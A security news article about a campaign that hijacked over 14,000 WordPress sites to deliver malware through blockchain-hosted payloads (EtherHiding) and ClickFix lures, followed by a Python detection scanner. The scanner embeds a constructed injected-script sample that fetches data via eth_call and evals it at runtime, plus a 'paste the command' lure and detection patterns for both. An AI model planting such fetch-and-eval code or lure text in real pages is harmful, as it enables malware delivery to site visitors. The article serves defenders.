- More than 14,000 WordPress sites were hacked to deliver malware
- Attackers installed a JavaScript downloader that fetches payloads from the blockchain
- Victims are lured into running commands manually via a “ClickFix” landing page
- Use of blockchain makes detection and takedown much harder
A newly uncovered campaign has seen more than fourteen thousand WordPress websites hijacked and turned into malware distribution hubs.
According to Google’s Threat Intelligence Group, a financially motivated hacking group tracked as UNC5142 is behind the mass attack. The sites were altered to serve malicious JavaScript to visitors, the first step in a chain that ends with the visitor being talked into installing malware on their own machine.
How the Attack Operated Through Blockchain
The hackers injected a multi-step JavaScript downloader, which Google tracks as CLEARSHOT, into the targeted WordPress sites. That downloader does not fetch its next stage from an attacker-owned web address that could simply be blocklisted.
Instead, it reads its next-stage instructions from smart contracts on a public blockchain, a technique commonly called EtherHiding. In its investigation, Google found the payload data stored on the BNB Smart Chain. The script retrieves it with ordinary JSON-RPC read requests (eth_call) to public chain gateways over HTTPS, so by using the blockchain for delivery the attackers made their setup harder both to detect and to dismantle.
Once CLEARSHOT gets its data, it launches a second stage. That stage delivers a landing page known as CLEARSHORT, crafted to trick visitors into running commands themselves. It tells them to copy a command and paste it into the Windows Run dialog or the macOS Terminal. Once executed, that command pulls down and runs the actual malware, which is why the injected script never has to exploit the visitor’s browser.
Social Engineering with “ClickFix” Tactics
The method used to trick victims is called ClickFix. The landing page tells users to act fast to fix a supposed system or browser problem and shows instructions along the lines of “paste this command now.” The page itself is delivered in encrypted form and decrypted in the visitor’s browser, and it is often hosted on Cloudflare .dev domains, which lends it a legitimate-looking address. Because the instructions are clear and time-sensitive, many users comply, especially when they already believe their computer has a problem.
In effect, the infected WordPress site functions as a launchpad. It serves the malicious downloader to visitors. The downloader queries the blockchain for its next-stage instructions and displays the lure. Finally the lure convinces the user to execute a command that installs the malware.
Why This Attack Stands Out
What makes this campaign especially dangerous is its combination of scale, stealth, and resilience. Over fourteen thousand sites were compromised. Many belonged to smaller or poorly maintained WordPress installations running outdated plugins, themes, or insecure configurations.
The use of the blockchain gives the attackers durable infrastructure. Transactions on a public blockchain cannot be deleted, so defenders cannot take the stored data down, and traditional takedown efforts against hosting providers do not apply. The data is read from smart contract storage, which the contract owner can update with a new transaction, so the attackers can rotate payload locations at will without ever touching the JavaScript planted on the victim sites. And because the script reaches the chain through ordinary HTTPS requests to legitimate public gateways, domain and IP blocklists built for conventional command-and-control traffic see nothing unusual.
Google observed UNC5142 activity from late 2023 until July 2025, with no new activity seen since. The report says it is unclear whether the group has disbanded or adopted new methods, but Google considers it likely that the group is still active under the radar, refining its obfuscation and hiding its command delivery.
What Site Owners and Users Should Watch
Site owners should audit plugins, themes, and WordPress core files. Many of the compromised sites were likely unpatched or running vulnerable extensions. Keeping everything up to date reduces the risk of the initial compromise, and an integrity check such as WP-CLI’s wp core verify-checksums, together with a search of theme files and the database (wp_posts and wp_options) for unfamiliar script tags, helps find an injection that has already happened.
Users should never paste unknown commands into the Run dialog, PowerShell, or a terminal. Legitimate sites rarely ask you to run shell or command line operations. If you encounter a prompt that demands immediate code entry to fix a problem, treat it as a lure.
Security teams should monitor for unusual JavaScript behavior on their own sites and in web proxy logs, in particular page scripts that issue JSON-RPC calls to blockchain gateways, that decrypt and eval code at runtime, or that carry ClickFix-style instructions. Combining traditional web threat detection with Web3-aware checks, such as watching for eth_call requests from browsers and pinning the contract addresses they target, helps counter attacks that hide their command delivery in decentralized systems.
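The following scanner is an added example, not code from Google’s report or from the UNC5142 campaign. It ties together the delivery chain described above (an injected script that reads its next stage from a smart contract through a JSON-RPC eth_call and then shows a ClickFix lure) and the detection advice just given. The sample page, the contract address, the function selector and the gateway watchlist are all constructed for this example; the ABI string decoder reflects how a Solidity contract returns a string from eth_call.

```python
import re

# Constructed sample of a compromised page. This is a hypothetical stand-in, NOT the
# real CLEARSHOT/CLEARSHORT code. It reproduces only the traits described in the
# article: an eth_call to a BNB Smart Chain gateway, runtime eval of the result, and a
# ClickFix-style lure. The contract address and selector are placeholders.
SAMPLE_PAGE = r"""
<html><body>
<p>Welcome to our bakery blog.</p>
<script>
(async () => {
  const rpc = "https://bsc-dataseed.binance.org/";
  const body = {"jsonrpc":"2.0","id":1,"method":"eth_call",
    "params":[{"to":"0x1111111111111111111111111111111111111111","data":"0xdeadbeef"},"latest"]};
  const r = await fetch(rpc, {method: "POST", body: JSON.stringify(body)});
  const j = await r.json();
  eval(decodeString(j.result));
})();
</script>
<div id="fix">Your browser needs an update. Press Win+R, paste the command below and press Enter.</div>
</body></html>
"""

# Hostname fragments of public BNB Smart Chain RPC gateways. Constructed watchlist;
# extend it with the gateways you actually see in your own traffic.
RPC_HOST_MARKERS = ("bsc-dataseed", "binance.org", "bnbchain.org", "nodereal.io")

# Phrases typical of ClickFix lures, matched case-insensitively. Constructed list.
CLICKFIX_PATTERNS = (
    r"win\s*\+\s*r",
    r"run\s+dialog",
    r"paste\s+(?:the\s+)?command",
    r"copy\s+(?:and|&)\s+paste",
    r"powershell",
    r"open\s+(?:the\s+)?terminal",
)


def decode_abi_string(result_hex: str) -> str:
    """Decode a single ABI-encoded `string` as returned by eth_call: word 0 is the
    byte offset of the string, then a length word, then the bytes padded to 32."""
    h = result_hex[2:] if result_hex.startswith("0x") else result_hex
    offset = int(h[0:64], 16) * 2                 # converted to hex-char index
    length = int(h[offset:offset + 64], 16) * 2   # same, for the data length
    data = h[offset + 64:offset + 64 + length]
    return bytes.fromhex(data).decode("utf-8")


def encode_abi_string(s: str) -> str:
    """Inverse of decode_abi_string; used to build fixtures for the decoder."""
    raw = s.encode("utf-8").hex()
    padded = raw + "0" * (-len(raw) % 64)
    return "0x" + format(32, "064x") + format(len(s.encode("utf-8")), "064x") + padded


def find_rpc_calls(text: str) -> dict:
    """Locate JSON-RPC eth_* calls and blockchain gateway URLs in page content."""
    calls = []
    for m in re.finditer(r'"method"\s*:\s*"(eth_\w+)"', text):
        window = text[m.start():m.start() + 400]     # look nearby for the target contract
        to = re.search(r'"to"\s*:\s*"(0x[0-9a-fA-F]{40})"', window)
        calls.append({"method": m.group(1), "contract": to.group(1) if to else None})
    urls = re.findall(r'https?://[^\s"\'<>]+', text)
    endpoints = sorted({u for u in urls if any(k in u for k in RPC_HOST_MARKERS)})
    return {"calls": calls, "endpoints": endpoints}


def find_clickfix_lures(text: str) -> list:
    lower = text.lower()
    return [p for p in CLICKFIX_PATTERNS if re.search(p, lower)]


def scan_page(html: str) -> dict:
    """Combine the signals into one verdict a SOC could act on."""
    rpc = find_rpc_calls(html)
    lures = find_clickfix_lures(html)
    evals = bool(re.search(r"\beval\s*\(|new\s+Function\s*\(", html))
    score = (2 if rpc["calls"] else 0) + (1 if rpc["endpoints"] else 0) \
        + (1 if evals else 0) + (2 if lures else 0)
    return {
        "score": score,
        "verdict": "malicious" if score >= 4 else "suspicious" if score >= 2 else "clean",
        "contracts": [c["contract"] for c in rpc["calls"] if c["contract"]],
        "endpoints": rpc["endpoints"],
        "lures": lures,
        "eval": evals,
    }


if __name__ == "__main__":
    print(scan_page(SAMPLE_PAGE))
    # A constructed eth_call result carrying a next-stage URL, decoded the way the
    # injected script would decode it:
    print(decode_abi_string(encode_abi_string("https://example.invalid/stage2.js")))
```

Run it over the HTML your WordPress sites actually serve (a headless fetch, not the files on disk, since the injection may live in the database rather than in a theme file). The contract addresses it extracts are the durable indicator: the URL a contract returns can change with a single transaction, so pin the address in your detections rather than the payload location it currently points to.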
Follow TechBSB For More Updates